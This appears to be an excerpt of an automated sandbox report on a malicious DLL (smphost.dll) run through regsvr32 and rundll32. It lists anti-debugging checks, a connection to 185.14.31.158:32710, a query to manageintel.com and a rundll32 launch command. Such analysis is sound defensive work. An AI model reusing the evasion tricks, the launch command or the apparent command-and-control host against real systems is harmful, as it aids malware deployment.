Source: regsvr32.exe, 00000002.00000003.365421594.0000000004F40000.00000004.00000800.00020000.00000000.sdmp, regsvr32.exe, 00000002.00000003.371091543.0000000004F60000.00000004.00000800.00020000.00000000.sdmp, regsvr32.exe, 00000002.00000003.370554878.0000000004EB0000.00000004.00000800.00020000.00000000.sdmp, regsvr32.exe, 00000002.00000003.367324157.0000000004F50000.00000004.00000800.00020000.00000000.sdmp, regsvr32.exe, 00000002.00000003.361237594.0000000004DA8000.00000004.00000800.00020000.00000000.sdmp, regsvr32.exe, 00000002.00000003.367859434.0000000004F60000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: bVf2XmkyVwC+WwEAAI1F4FpWU1dl//91iQ4iqeMuV07UhiCL+IN94AoPhboPAACF |
Source: C:\Windows\SysWOW64\regsvr32.exe |
Code function: 2_2_6E9E9CF7 IsDebuggerPresent,OutputDebugStringW, |
2_2_6E9E9CF7 |
Source: C:\Windows\SysWOW64\regsvr32.exe |
Code function: 2_2_6E9EFE17 GetProcessHeap, |
2_2_6E9EFE17 |
Source: C:\Windows\SysWOW64\regsvr32.exe |
Code function: 2_2_6E9E1710 mov eax, dword ptr fs:[00000030h] |
2_2_6E9E1710 |
Source: C:\Windows\SysWOW64\regsvr32.exe |
Code function: 2_2_6E9E1490 mov eax, dword ptr fs:[00000030h] |
2_2_6E9E1490 |
Source: C:\Windows\SysWOW64\regsvr32.exe |
Code function: 2_2_6E9E83B0 mov eax, dword ptr fs:[00000030h] |
2_2_6E9E83B0 |
Source: C:\Windows\SysWOW64\regsvr32.exe |
Code function: 2_2_6E9EC865 mov eax, dword ptr fs:[00000030h] |
2_2_6E9EC865 |
Source: C:\Windows\SysWOW64\regsvr32.exe |
Code function: 2_2_6E9EE9B4 mov eax, dword ptr fs:[00000030h] |
2_2_6E9EE9B4 |
Source: C:\Windows\SysWOW64\regsvr32.exe |
Code function: 38_2_6F841710 mov eax, dword ptr fs:[00000030h] |
38_2_6F841710 |
Source: C:\Windows\SysWOW64\regsvr32.exe |
Code function: 38_2_6F841490 mov eax, dword ptr fs:[00000030h] |
38_2_6F841490 |
Source: C:\Windows\SysWOW64\regsvr32.exe |
Code function: 38_2_6F8483B0 mov eax, dword ptr fs:[00000030h] |
38_2_6F8483B0 |
Source: C:\Windows\SysWOW64\regsvr32.exe |
Code function: 38_2_6F84E9B4 mov eax, dword ptr fs:[00000030h] |
38_2_6F84E9B4 |
Source: C:\Windows\SysWOW64\regsvr32.exe |
Code function: 38_2_6F84C865 mov eax, dword ptr fs:[00000030h] |
38_2_6F84C865 |
Source: C:\Windows\SysWOW64\regsvr32.exe |
Process queried: DebugPort |
Jump to behavior |
Source: C:\Windows\SysWOW64\regsvr32.exe |
Process queried: DebugPort |
Jump to behavior |
Source: C:\Windows\SysWOW64\regsvr32.exe |
Code function: 2_2_6E9E9AED SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, |
2_2_6E9E9AED |
Source: C:\Windows\SysWOW64\regsvr32.exe |
Code function: 2_2_6E9EC0A3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, |
2_2_6E9EC0A3 |
Source: C:\Windows\SysWOW64\regsvr32.exe |
Code function: 2_2_6E9E9839 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, |
2_2_6E9E9839 |
Source: C:\Windows\SysWOW64\regsvr32.exe |
Code function: 38_2_6F849AED SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, |
38_2_6F849AED |
Source: C:\Windows\SysWOW64\regsvr32.exe |
Code function: 38_2_6F84C0A3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, |
38_2_6F84C0A3 |
Source: C:\Windows\SysWOW64\regsvr32.exe |
Code function: 38_2_6F849839 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, |
38_2_6F849839 |
Source: C:\Windows\SysWOW64\regsvr32.exe |
Network Connect: 185.14.31.158 32710 |
Jump to behavior |
Source: C:\Windows\SysWOW64\regsvr32.exe |
Domain query: manageintel.com |
|
Source: C:\Windows\SysWOW64\cmd.exe |
Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\smphost.dll",#1 |
Jump to behavior |
Source: C:\Windows\SysWOW64\regsvr32.exe |
Code function: 2_2_6E9E9658 cpuid |
2_2_6E9E9658 |
Source: C:\Windows\SysWOW64\regsvr32.exe |
Code function: 2_2_6E9E99A8 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, |
2_2_6E9E99A8 |
Source: C:\Windows\SysWOW64\regsvr32.exe |
Code function: 2_2_6E9E8630 DllInstall,FormatMessageA,TextOutW,TextOutA,FormatMessageW,CoInitialize,OleInitialize,CoCreateInstance,CoGetCallerTID,FlattenPath,CreatePopupMenu,GetProductInfo,SetFileAttributesW,CharNextW,SHGetThreadRef,DceErrorInqTextA,GetConsoleCP,UuidCreate,GetMessageTime,GetVersion,GetPriorityClass,GetProcessId,IsTokenRestricted,RevertToSelf,RpcExceptionFilter,CveEventWrite,CoCancelCall,CoTaskMemAlloc,GetSidIdentifierAuthority,DisableThreadLibraryCalls,IsValidAcl,IsValidSid,CreateMutexExW,SHStrDupW,SHStrDupA,DuplicateIcon, |
2_2_6E9E8630 |